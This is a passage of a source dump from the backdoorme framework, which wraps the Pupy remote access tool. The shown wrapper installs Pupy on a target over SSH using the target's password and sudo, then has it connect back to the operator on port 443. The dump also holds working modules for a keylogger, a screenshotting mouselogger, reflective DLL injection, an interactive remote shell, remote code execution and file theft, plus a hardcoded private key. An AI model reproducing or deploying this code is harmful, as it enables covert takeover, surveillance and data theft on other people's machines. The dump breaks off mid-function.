python 2 | # -*- coding: UTF8 -*- 3 | 4 | import marshal, zlib 5 | modules = marshal.loads(zlib.decompress(open("library_compressed_string.txt",'rb').read())) 6 | for f in sorted([x for x in modules.iterkeys()]): 7 | print f 8 | 9 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/thread.h: -------------------------------------------------------------------------------- 1 | #ifndef _METERPRETER_LIB_THREAD_H 2 | #define _METERPRETER_LIB_THREAD_H 3 | 4 | #ifdef _WIN32 5 | 6 | /*****************************************************************************************/ 7 | // Win32/64 specific definitions... 8 | 9 | typedef struct __UNICODE_STRING 10 | { 11 | USHORT Length; 12 | USHORT MaximumLength; 13 | PWSTR Buffer; 14 | } _UNICODE_STRING, * _PUNICODE_STRING; 15 | 16 | typedef struct __OBJECT_ATTRIBUTES 17 | { 18 | ULONG Length; 19 | HANDLE RootDirectory; 20 | _PUNICODE_STRING ObjectName; 21 | ULONG Attributes; 22 | PVOID SecurityDescriptor; 23 | PVOID SecurityQualityOfService; 24 | } _OBJECT_ATTRIBUTES, * _POBJECT_ATTRIBUTES; 25 | 26 | typedef struct __CLIENT_ID 27 | { 28 | PVOID UniqueProcess; 29 | PVOID UniqueThread; 30 | } _CLIENT_ID, * _PCLIENT_ID; 31 | 32 | typedef HANDLE (WINAPI * OPENTHREAD)( DWORD, BOOL, DWORD ); // kernel32!OpenThread 33 | 34 | typedef DWORD (WINAPI * NTOPENTHREAD)( PHANDLE, ACCESS_MASK, _POBJECT_ATTRIBUTES, _PCLIENT_ID ); // ntdll!NtOpenThread 35 | 36 | /*****************************************************************************************/ 37 | 38 | #else 39 | #include "pthread.h" 40 | #endif // _WIN32 41 | 42 | typedef struct _LOCK 43 | { 44 | #ifdef _WIN32 45 | HANDLE handle; 46 | #else 47 | pthread_mutex_t *handle; 48 | #endif // _WIN32 49 | } LOCK, * LPLOCK; 50 | 51 | typedef struct _EVENT 52 | { 53 | HANDLE handle; 54 | } EVENT, * LPEVENT; 55 | 56 | typedef struct _THREAD 57 | { 58 | DWORD id; 59 | HANDLE handle; 60 | EVENT * sigterm; 61 | LPVOID parameter1; 62 | LPVOID parameter2; 63 | LPVOID parameter3; 64 | #ifndef _WIN32 65 | void *suspend_thread_data; 66 | pthread_t pid; 67 | int thread_started; 68 | #endif 69 | } THREAD, * LPTHREAD; 70 | 71 | #ifdef __GNUC__ 72 | #define THREADCALL __attribute__((stdcall)) 73 | #else // ! gcc 74 | #define THREADCALL __stdcall 75 | #endif 76 | 77 | typedef DWORD (THREADCALL * THREADFUNK)( THREAD * thread ); 78 | 79 | /*****************************************************************************************/ 80 | 81 | LOCK * lock_create( VOID ); 82 | 83 | VOID lock_destroy( LOCK * lock ); 84 | 85 | VOID lock_acquire( LOCK * lock ); 86 | 87 | VOID lock_release( LOCK * lock ); 88 | 89 | /*****************************************************************************************/ 90 | 91 | EVENT * event_create( VOID ); 92 | 93 | BOOL event_destroy( EVENT * event ); 94 | 95 | BOOL event_signal( EVENT * event ); 96 | 97 | BOOL event_poll( EVENT * event, DWORD timeout ); 98 | 99 | /*****************************************************************************************/ 100 | 101 | THREAD * thread_open( VOID ); 102 | 103 | THREAD * thread_create( THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3 ); 104 | 105 | BOOL thread_run( THREAD * thread ); 106 | 107 | BOOL thread_sigterm( THREAD * thread ); 108 | 109 | BOOL thread_kill( THREAD * thread ); 110 | 111 | BOOL thread_join( THREAD * thread ); 112 | 113 | BOOL thread_destroy( THREAD * thread ); 114 | 115 | /*****************************************************************************************/ 116 | 117 | #endif 118 | 119 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | import os 3 | 4 | class Pupy(Backdoor): 5 | prompt = Fore.RED + "(pupy) " + Fore.BLUE + ">> " + Fore.RESET 6 | 7 | def __init__(self, core): 8 | cmd.Cmd.__init__(self) 9 | self.intro = GOOD + "Using Pupy backdoor..." 10 | self.core = core 11 | self.options = { 12 | "port" : Option("port", 53923, "port to connect to", True), 13 | } 14 | self.modules = {} 15 | self.allow_modules = True 16 | self.help_text = INFO + "Uses n1nj4sec's Pupy backdoor." 17 | 18 | def get_command(self): 19 | return "echo " + self.core.curtarget.pword + " | sudo -S python ~/pupy/pupy/pp.py simple --host " + self.core.localIP + ":443" 20 | 21 | def do_exploit(self, args): 22 | port = self.get_value("port") 23 | target = self.core.curtarget 24 | print("Thanks to n1nj4sec for the pupy backdoor. Note that this script must be run with sudo.") 25 | os.system("rm pupy/pupy/packages/all/scapy") 26 | target.ssh.exec_command("echo " + target.pword + ' | sudo -S rm -rf pupy') 27 | target.scpFiles(self, '__pupy/pupy', True) 28 | target.scpFiles(self, 'rpyc', True) 29 | target.ssh.exec_command("echo " + target.pword + " | sudo -S mv -f rpyc /usr/local/lib/python2.7/dist-packages") 30 | input("Please navigate to the backdoorme/pupy/pupy directory and run 'python pupysh.py'. Press enter when you are ready.") 31 | target.ssh.exec_command(self.get_command()) 32 | 33 | input(GOOD + "Backdoor attempted on target machine. To run a command, type sessions -i [id] and then 'exec .") 34 | 35 | for mod in self.modules.keys(): 36 | print(INFO + "Attempting to execute " + mod.name + " module...") 37 | mod.exploit() 38 | 39 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/crypto/cert.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDjzCCAnegAwIBAgIJAIK87pAgfXeYMA0GCSqGSIb3DQEBCwUAMF4xCzAJBgNV 3 | BAYTAkZSMQ8wDQYDVQQIDAZGcmFuY2UxETAPBgNVBAcMCGludGVybmV0MQ0wCwYD 4 | VQQKDARQdXB5MQ0wCwYDVQQLDARQdXB5MQ0wCwYDVQQDDARQdXB5MB4XDTE1MDky 5 | MTE5NTI0NFoXDTE2MDkyMDE5NTI0NFowXjELMAkGA1UEBhMCRlIxDzANBgNVBAgM 6 | BkZyYW5jZTERMA8GA1UEBwwIaW50ZXJuZXQxDTALBgNVBAoMBFB1cHkxDTALBgNV 7 | BAsMBFB1cHkxDTALBgNVBAMMBFB1cHkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAw 8 | ggEKAoIBAQDCALki+F7IVLB3UQO3tAGMJFS5WuDHawhqriEfsIVnG/UQfuQmcGJ1 9 | FiUhytH82fhbLEUroYXbGQRvEEBZWIPIyOW7Z6BASRgOSKQL8HaE3cgROY09B4Ra 10 | QNmFhowd/XXO1pHm0wYpQ0gnZxZkNkRCT+fD4OP0IepCHf7r/vgMbAILQTFx4zU3 11 | DdF/2Mcyfvg4uPKio214dZZoo/LnptHo63RHstwb+KmaSGvGBq2Yd7vZRPwjqDR4 12 | RPYc3O9bJce3W8hFw3hPUhgwxHX8o4nDkWMPnBga8d9aeTIZTMbBVY6G/8HJdp1s 13 | rCoxqB67Dqhnka+qQBO8DHulMXnoQKutAgMBAAGjUDBOMB0GA1UdDgQWBBTGAL40 14 | Q6MYGSQ5papCCHiqhD8ELzAfBgNVHSMEGDAWgBTGAL40Q6MYGSQ5papCCHiqhD8E 15 | LzAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAW0wYlhU4D5X0GKkiZ 16 | p+vGvN3ja/PY+yK9JozKD56eMrmoGk3/105ro+IvliY0EiEKuL6PBNZsCmDwutNZ 17 | 2Qk+W8LJJIN8QtGLR+KI2MGKQZGJQrCw1mZVM8sN0hQOViog/20Lk+2dtnMTKHRc 18 | kdmFyWa2zZlPIEANRfs9QjctAjS4UetzbJ+gjeJV45+0xsAjNLXQfmKjbGm8ZWWV 19 | 6BisRQ9h+lH+YFnuEV6SLZgMdqVKN+CPiwFI4wnHSEpZR1twk6wlUmM/xrl68aIg 20 | e1rycdex3u2JuDxMqBA2rAcJP1kJfKmRz6FfZBfj1zZYUps2tx6cKn2s/BbgqErK 21 | eXlU 22 | -----END CERTIFICATE----- 23 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/crypto/gen.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | openssl req -new -x509 -keyout server.pem -out cert.pem -days 365 -nodes 3 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/crypto/server.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDCALki+F7IVLB3 3 | UQO3tAGMJFS5WuDHawhqriEfsIVnG/UQfuQmcGJ1FiUhytH82fhbLEUroYXbGQRv 4 | EEBZWIPIyOW7Z6BASRgOSKQL8HaE3cgROY09B4RaQNmFhowd/XXO1pHm0wYpQ0gn 5 | ZxZkNkRCT+fD4OP0IepCHf7r/vgMbAILQTFx4zU3DdF/2Mcyfvg4uPKio214dZZo 6 | o/LnptHo63RHstwb+KmaSGvGBq2Yd7vZRPwjqDR4RPYc3O9bJce3W8hFw3hPUhgw 7 | xHX8o4nDkWMPnBga8d9aeTIZTMbBVY6G/8HJdp1srCoxqB67Dqhnka+qQBO8DHul 8 | MXnoQKutAgMBAAECggEAEHJnP6O2xV0IqNThb81+5BagaCZgMAfO6txgSoN4i8k+ 9 | +WsIhIm6jxqVg0viiYEhIPmb05sZ8f0o9xF1ox1x7q+5ai3a1BheRbe60JhOM+1p 10 | bKxoYOgmPFCLIFrLvi8isapXLC5vs0fU8iI3L7+6AbUsfNqv+J53cauBVRiEhujr 11 | aK23EJyY1FrklFGyn/qJKKw89sArg63S4cf1JZ/05xkiVV6sivVjDLnQRjBM3gex 12 | l0SMlHJseudV40AGUwOVeABdijrTTB2CpoMjsSH9wSRN7jCC6sJaqViq9+sMCdXo 13 | IyR+ifisM0yrNC0U19h/v3psbIYlLRUOQDKN5lGIgQKBgQDitzPk867oxUIPT0mq 14 | QV6lD8ySNeGqDFpp2GFaEMcap1lp7Y9LIeqxghN1PZoZ5v29NoxxQNxCFhfo+VHo 15 | vSoECKcEvR3RQkaA24IR41BQcLea/D6lea3KFC/K0ze7y0Pm5bw9Unv3+3pZb0pO 16 | VxAzuV2ldRd2eHzEpn0BJyVraQKBgQDbD86lluqxxL7/mYITdxANtpb3yTnTdrv0 17 | Xl3scOb4umGAj4qBPFDHhmGz/6SmM2LKKA8sSps/XKfDHQEXzUMRenaU+CKKiE7r 18 | YA0GdZWgBYgtVCDCpuu8RNfbW+vx2uLvRr2iZJW7MQQtPdZ8rF01GKG0vQ67tbpR 19 | 8BuWBMXJpQKBgQDIaSSBlnwengkIWZGH5GNSzEWNVf4XAPaHrFRadoxa3mZnAi3y 20 | P5gktBSZRgxMK2pP8cFyd+B8tuUJ+CNU9qsGh9OEl9yc19ZVIDW5tFSR1yIm6iZC 21 | xu4+vVuGEvKomkV6/chJ+PlHPFFqb7uixsm2v3ytv3UvL9EzUO0dsMoeSQKBgQCp 22 | Zdzf8gdFNqaYUyXiVYTlhdfSfxonaz7HJp4s89W4a7BwUQ/DBlhVIpa1MbAqEbyI 23 | JVguYPcSlVzppakttb3yayf95LAZPnUA0QLhhtYQq5Z1rwOyYpASw43EhJ29Jg2t 24 | CKAmTu/2lF3tek89k7B0GbsaX8Rf5ZTSPgGnDcPBPQKBgHNfcTM34Kuqd5taxUEy 25 | kIvgHvLBfOk7PbV3Zsejp1ZZllwTkoxDxDBCkELgZ4jfsXGaJxg9bCYkuDS1Jsg1 26 | 3F/hTvlV79UX+dfPgz9FPY8rzoPZ0ukKONXhO68m7ywQJOdtkBO/lXad93JvSDDy 27 | nntqa2r7P+igcForz17n95Wy 28 | -----END PRIVATE KEY----- 29 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/pupy/modules/__init__.py -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/download.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | from pupylib.PupyCompleter import * 4 | from rpyc.utils.classic import download 5 | import os 6 | import os.path 7 | 8 | __class_name__="DownloaderScript" 9 | 10 | class DownloaderScript(PupyModule): 11 | """ download a file/directory from a remote system """ 12 | def init_argparse(self): 13 | self.arg_parser = PupyArgumentParser(prog='download', description=self.__doc__) 14 | self.arg_parser.add_argument('remote_file', metavar='') 15 | self.arg_parser.add_argument('local_file', nargs='?', metavar='', completer=path_completer) 16 | def run(self, args): 17 | remote_file=self.client.conn.modules['os.path'].expandvars(args.remote_file) 18 | rep=os.path.join("data","downloads",self.client.short_name()) 19 | if not args.local_file: 20 | try: 21 | os.makedirs(rep) 22 | except Exception: 23 | pass 24 | args.local_file=os.path.join(rep, os.path.basename(remote_file.replace("\\",os.sep).replace("/",os.sep).rstrip("/\\"))) 25 | self.info("downloading %s ..."%remote_file) 26 | download(self.client.conn, remote_file, args.local_file) 27 | self.success("file downloaded from remote:%s to local:%s"%(remote_file, args.local_file)) 28 | 29 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/exit.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | from pupylib.PupyErrors import PupyModuleError 4 | 5 | __class_name__="ExitModule" 6 | 7 | class ExitModule(PupyModule): 8 | """ exit the client on the other side """ 9 | 10 | def init_argparse(self): 11 | self.arg_parser = PupyArgumentParser(prog="exit", description=self.__doc__) 12 | self.arg_parser.add_argument('--yes', action="store_true", help='exit confirmation') 13 | 14 | def run(self, args): 15 | if args.yes: 16 | try: 17 | self.client.conn.exit() 18 | except Exception: 19 | pass 20 | else: 21 | raise PupyModuleError("Warning: if you do this you will loose your shell. Please conform with --yes to perform this action.") 22 | return "client exited" 23 | 24 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/get_info.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | 4 | __class_name__="GetInfo" 5 | 6 | class GetInfo(PupyModule): 7 | """ get some informations about one or multiple clients """ 8 | def init_argparse(self): 9 | self.arg_parser = PupyArgumentParser(prog='get_info', description=self.__doc__) 10 | #self.arg_parser.add_argument('arguments', nargs='+', metavar='') 11 | def run(self, args): 12 | infos="" 13 | for k,v in self.client.desc.iteritems(): 14 | if k not in ["conn","id","user","platform"]: 15 | infos+="{:<10}: {}\n".format(k,v) 16 | self.rawlog(infos) 17 | 18 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/getprivs.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | 4 | __class_name__="GetPrivsModule" 5 | 6 | class GetPrivsModule(PupyModule): 7 | """ try to get SeDebugPrivilege for the current process """ 8 | 9 | def init_argparse(self): 10 | self.arg_parser = PupyArgumentParser(prog="getprivs", description=self.__doc__) 11 | 12 | @windows_only 13 | def is_compatible(self): 14 | pass 15 | 16 | def run(self, args): 17 | #self.client.conn.modules.ctypes.windll.user32.MessageBoxA(None, args.text, args.title, 0) 18 | self.client.load_package("pupwinutils.security", force=True) 19 | self.client.conn.modules["pupwinutils.security"].EnablePrivilege("SeDebugPrivilege") 20 | self.success("SeDebugPrivilege enabled !") 21 | 22 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/interactive_shell.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | from pupylib.utils.rpyc_utils import redirected_stdio 4 | 5 | __class_name__="InteractiveShell" 6 | 7 | 8 | class InteractiveShell(PupyModule): 9 | """ open an interactive command shell """ 10 | max_clients=1 11 | def init_argparse(self): 12 | self.arg_parser = PupyArgumentParser(description=self.__doc__) 13 | #self.arg_parser.add_argument('arguments', nargs='+', metavar='') 14 | 15 | def run(self, args): 16 | self.client.load_package("interactive_shell") 17 | program="/bin/sh" 18 | encoding=None 19 | if self.client.is_windows(): 20 | program="cmd.exe" 21 | encoding="cp437" 22 | with redirected_stdio(self.client.conn): 23 | self.client.conn.modules.interactive_shell.interactive_open(program=program, encoding=encoding) 24 | 25 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/keylogger.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | import StringIO 4 | import SocketServer 5 | import threading 6 | import socket 7 | import logging 8 | import struct 9 | import traceback 10 | import time 11 | 12 | __class_name__="KeyloggerModule" 13 | 14 | class KeyloggerModule(PupyModule): 15 | """ a simple keylogger :-) """ 16 | #max_clients=1 17 | daemon=True 18 | unique_instance=True 19 | keylogger=None 20 | def init_argparse(self): 21 | self.arg_parser = PupyArgumentParser(prog='keylogger', description=self.__doc__) 22 | self.arg_parser.add_argument('action', choices=['start', 'stop', 'dump']) 23 | 24 | @windows_only 25 | def is_compatible(self): 26 | pass 27 | 28 | def stop_daemon(self): 29 | self.success("keylogger stopped") 30 | 31 | def run(self, args): 32 | if args.action=="start": 33 | if self.keylogger: 34 | self.error("the keylogger is already started") 35 | else: 36 | self.client.load_package("pupwinutils.keylogger") 37 | self.keylogger=self.client.conn.modules["pupwinutils.keylogger"].KeyLogger() 38 | self.keylogger.start() 39 | else: 40 | if not self.keylogger: 41 | self.error("the keylogger is not running") 42 | return 43 | if args.action=="dump": 44 | self.success("dumping recorded keystrokes :") 45 | self.log(self.keylogger.dump()) 46 | elif args.action=="stop": 47 | self.keylogger.stop() 48 | self.job.stop() 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/migrate.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | import pupygen 4 | import os.path 5 | import time 6 | 7 | __class_name__="MigrateModule" 8 | 9 | 10 | def has_proc_migrated(client, pid): 11 | for c in client.pupsrv.clients: 12 | if all([True for x in c.desc if x in ["hostname", "platform", "release", "version", "macaddr"] and client.desc[x]==c.desc[x]]): 13 | if int(c.desc["pid"])==pid: 14 | return c 15 | return None 16 | 17 | class MigrateModule(PupyModule): 18 | """ Migrate pupy into another process using reflective DLL injection """ 19 | max_clients=1 20 | def init_argparse(self): 21 | self.arg_parser = PupyArgumentParser(prog="migrate", description=self.__doc__) 22 | group = self.arg_parser.add_mutually_exclusive_group(required=True) 23 | group.add_argument('-c', '--create', metavar='',help='create a new process and inject into it') 24 | group.add_argument('pid', nargs='?', type=int, help='pid') 25 | 26 | @windows_only 27 | def is_compatible(self): 28 | pass 29 | 30 | def run(self, args): 31 | pid=None 32 | self.client.load_package("psutil") 33 | self.client.load_package("pupwinutils.processes") 34 | if args.create: 35 | p=self.client.conn.modules['pupwinutils.processes'].start_hidden_process(args.create) 36 | pid=p.pid 37 | self.success("%s created with pid %s"%(args.create,pid)) 38 | else: 39 | pid=args.pid 40 | dllbuf=b"" 41 | isProcess64bits=False 42 | #TODO automatically fill ip/port 43 | self.success("looking for configured connect back address ...") 44 | res=self.client.conn.modules['pupy'].get_connect_back_host() 45 | host, port=res.rsplit(':',1) 46 | self.success("address configured is %s:%s ..."%(host,port)) 47 | self.success("looking for process %s architecture ..."%pid) 48 | if self.client.conn.modules['pupwinutils.processes'].is_process_64(pid): 49 | isProcess64bits=True 50 | self.success("process is 64 bits") 51 | dllbuff=pupygen.get_edit_pupyx64_dll(host, port) 52 | else: 53 | self.success("process is 32 bits") 54 | dllbuff=pupygen.get_edit_pupyx86_dll(host, port) 55 | self.success("injecting DLL in target process %s ..."%pid) 56 | self.client.conn.modules['pupy'].reflective_inject_dll(pid, dllbuff, isProcess64bits) 57 | self.success("DLL injected !") 58 | self.success("waiting for a connection from the DLL ...") 59 | while True: 60 | c=has_proc_migrated(self.client, pid) 61 | if c: 62 | self.success("got a connection from migrated DLL !") 63 | c.desc["id"]=self.client.desc["id"] 64 | break 65 | time.sleep(0.1) 66 | try: 67 | self.client.conn.exit() 68 | except Exception: 69 | pass 70 | 71 | 72 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/mouselogger.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | # Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) 3 | # All rights reserved. 4 | 5 | from pupylib.PupyModule import * 6 | import logging 7 | import traceback 8 | import time 9 | import os 10 | import os.path 11 | from pupylib.utils.rpyc_utils import obtain 12 | 13 | def pil_save(filename, pixels, width, height): 14 | from PIL import Image, ImageFile 15 | buffer_len = (width * 3 + 3) & -4 16 | img = Image.frombuffer('RGB', (width, height), pixels, 'raw', 'BGR', buffer_len, 1) 17 | ImageFile.MAXBLOCK = width * height 18 | img=img.transpose(Image.FLIP_TOP_BOTTOM) 19 | img.save(filename, quality=95, optimize=True, progressive=True) 20 | 21 | __class_name__="MouseLoggerModule" 22 | 23 | class MouseLoggerModule(PupyModule): 24 | """ log mouse clicks and take screenshots of areas around it """ 25 | # WARNING : screenshots are kept in memory before beeing dumped 26 | #TODO change that and add a callback to automatically send back screenshots without need for dumping 27 | daemon=True 28 | unique_instance=True 29 | 30 | def __init__(self, *args, **kwargs): 31 | PupyModule.__init__(self, *args, **kwargs) 32 | self.mouselogger=None 33 | 34 | def init_argparse(self): 35 | self.arg_parser = PupyArgumentParser(prog='mouselogger', description=self.__doc__) 36 | self.arg_parser.add_argument('action', choices=['start', 'stop', 'dump']) 37 | 38 | @windows_only 39 | def is_compatible(self): 40 | pass 41 | 42 | def stop_daemon(self): 43 | self.success("mouselogger stopped") 44 | 45 | def run(self, args): 46 | try: 47 | os.makedirs(os.path.join("data","mouselogger")) 48 | except Exception: 49 | pass 50 | if args.action=="start": 51 | if self.mouselogger: 52 | self.error("the mouselogger is already started") 53 | else: 54 | self.client.load_package("pupwinutils.mouselogger") 55 | self.mouselogger=self.client.conn.modules["pupwinutils.mouselogger"].MouseLogger() 56 | self.mouselogger.start() 57 | else: 58 | if not self.mouselogger: 59 | self.error("the mouselogger is not running") 60 | return 61 | if args.action=="dump": 62 | self.success("dumping recorded mouse clicks :") 63 | screenshots_list=obtain(self.mouselogger.retrieve_screenshots()) 64 | 65 | self.success("%s screenshots taken"%len(screenshots_list)) 66 | print str(screenshots_list)[0:50] 67 | for d, height, width, buf in screenshots_list: 68 | filepath=os.path.join("data","mouselogger","scr_"+self.client.short_name()+"_"+str(d).replace(" ","_").replace(":","-")+".jpg") 69 | pil_save(filepath, buf, width, height) 70 | self.info("screenshot saved to %s"%filepath) 71 | elif args.action=="stop": 72 | self.mouselogger.stop() 73 | self.job.stop() 74 | 75 | 76 | 77 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/msgbox.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | 4 | __class_name__="MsgBoxPopup" 5 | 6 | class MsgBoxPopup(PupyModule): 7 | """ Pop up a custom message box """ 8 | 9 | def init_argparse(self): 10 | self.arg_parser = PupyArgumentParser(prog="msgbox", description=self.__doc__) 11 | self.arg_parser.add_argument('--title', help='msgbox title') 12 | self.arg_parser.add_argument('text', help='text to print in the msgbox :)') 13 | 14 | @windows_only 15 | def is_compatible(self): 16 | pass 17 | 18 | def run(self, args): 19 | #self.client.conn.modules.ctypes.windll.user32.MessageBoxA(None, args.text, args.title, 0) 20 | self.client.load_package("pupwinutils.msgbox") 21 | self.client.conn.modules['pupwinutils.msgbox'].MessageBox(args.text, args.title) 22 | self.log("message box popped !") 23 | 24 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/process_kill.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | 4 | __class_name__="KillModule" 5 | 6 | class KillModule(PupyModule): 7 | """ kill a process """ 8 | 9 | def init_argparse(self): 10 | self.arg_parser = PupyArgumentParser(prog="kill", description=self.__doc__) 11 | self.arg_parser.add_argument('pid', type=int, help='pid to kill') 12 | 13 | def run(self, args): 14 | self.client.conn.modules.os.kill(args.pid,9) 15 | self.success("process killed !") 16 | 17 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/ps.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | from pupylib.utils.rpyc_utils import obtain 4 | 5 | __class_name__="PsModule" 6 | 7 | class PsModule(PupyModule): 8 | """ list processes """ 9 | 10 | def init_argparse(self): 11 | self.arg_parser = PupyArgumentParser(prog="ps", description=self.__doc__) 12 | self.arg_parser.add_argument('--all', '-a', action='store_true', help='more info') 13 | 14 | @windows_only 15 | def is_compatible(self): 16 | pass 17 | 18 | def run(self, args): 19 | #self.client.conn.modules.ctypes.windll.user32.MessageBoxA(None, args.text, args.title, 0) 20 | self.client.load_package("psutil") 21 | self.client.load_package("pupwinutils.processes") 22 | outputlist=self.client.conn.modules["pupwinutils.processes"].enum_processes() 23 | outputlist=obtain(outputlist) #pickle the list of proxy objects with obtain is really faster 24 | columns=['username', 'pid', 'arch', 'exe'] 25 | if args.all: 26 | columns=['username', 'pid', 'arch', 'name', 'exe', 'cmdline', 'status'] 27 | for dic in outputlist: 28 | dic["cmdline"]=' '.join(dic['cmdline'][1:]) 29 | else: 30 | for dic in outputlist: 31 | if 'exe' in dic and not dic['exe'] and 'name' in dic and dic['name']: 32 | dic['exe']=dic['name'] 33 | if 'username' in dic and dic['username'] is None: 34 | dic['username']="" 35 | self.rawlog(self.formatter.table_format(outputlist, wl=columns)) 36 | 37 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/pyexec.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | import StringIO 4 | from pupylib.utils.rpyc_utils import redirected_stdo 5 | 6 | __class_name__="PythonExec" 7 | 8 | class PythonExec(PupyModule): 9 | """ execute python code on a remote system """ 10 | def init_argparse(self): 11 | self.arg_parser = PupyArgumentParser(prog='pyexec', description=self.__doc__) 12 | group=self.arg_parser.add_mutually_exclusive_group(required=True) 13 | group.add_argument('--file', metavar="", help="execute code from .py file") 14 | group.add_argument('-c','--code', metavar='', help="execute python oneliner code. ex : 'import platform;print platform.uname()'") 15 | 16 | def run(self, args): 17 | code="" 18 | if args.file: 19 | self.info("loading code from %s ..."%args.file) 20 | with open(args.file,'r') as f: 21 | code=f.read() 22 | else: 23 | code=args.code 24 | stdout=StringIO.StringIO() 25 | stderr=StringIO.StringIO() 26 | try: 27 | with redirected_stdo(self.client.conn, stdout, stderr): 28 | self.client.conn.execute(code+"\n") 29 | res=stdout.getvalue() 30 | err=stderr.getvalue() 31 | if err.strip(): 32 | err="\n"+err 33 | self.rawlog(res+err) 34 | finally: 35 | stdout.close() 36 | stderr.close() 37 | 38 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/pyshell.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | import sys 4 | import subprocess 5 | import threading 6 | import Queue 7 | from pupylib.utils.rpyc_utils import interact 8 | 9 | import time 10 | 11 | __class_name__="InteractivePythonShell" 12 | 13 | 14 | def enqueue_output(out, queue): 15 | for c in iter(lambda: out.read(1), b""): 16 | queue.put(c) 17 | 18 | class InteractivePythonShell(PupyModule): 19 | """ open an interactive python shell on the remote client """ 20 | max_clients=1 21 | def init_argparse(self): 22 | self.arg_parser = PupyArgumentParser(prog='pyshell', description=self.__doc__) 23 | def run(self, args): 24 | try: 25 | interact(self.client.conn) 26 | except KeyboardInterrupt: 27 | pass 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/search.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | 4 | __class_name__="SearchModule" 5 | 6 | class SearchModule(PupyModule): 7 | """ walk through a directory and recursively search a string into files """ 8 | daemon=True 9 | def init_argparse(self): 10 | self.arg_parser = PupyArgumentParser(prog="search", description=self.__doc__) 11 | self.arg_parser.add_argument('path', help='path') 12 | self.arg_parser.add_argument('-e','--extensions',metavar='ext1,ext2,...', help='limit to some extensions') 13 | self.arg_parser.add_argument('strings', nargs='+', metavar='string', help='strings to search') 14 | self.arg_parser.add_argument('-m','--max-size', type=int, default=None, help='max file size') 15 | 16 | def run(self, args): 17 | self.client.load_package("pupyutils.search", force=True) 18 | exts=[] 19 | if args.extensions: 20 | exts=args.extensions.split(',') 21 | self.info("searching strings %s in %s ..."%(args.strings, args.path)) 22 | for res in self.client.conn.modules['pupyutils.search'].search_path(args.path, args.strings, files_extensions=exts, max_size=args.max_size): 23 | self.success("%s:%s > %s"%(res[0],res[1],res[2])) 24 | self.info("search finished !") 25 | 26 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/shell_exec.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | import subprocess 4 | from rpyc.utils.helpers import restricted 5 | __class_name__="ShellExec" 6 | 7 | class ShellExec(PupyModule): 8 | """ execute shell commands on a remote system """ 9 | def init_argparse(self): 10 | self.arg_parser = PupyArgumentParser(prog='shell_exec', description=self.__doc__) 11 | self.arg_parser.add_argument('argument', nargs='+') 12 | def run(self, args): 13 | res="" 14 | try: 15 | res=self.client.conn.modules.subprocess.check_output(' '.join(args.argument), stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True, universal_newlines=True) 16 | except Exception as e: 17 | if hasattr(e,'output') and e.output: 18 | res=e.output 19 | else: 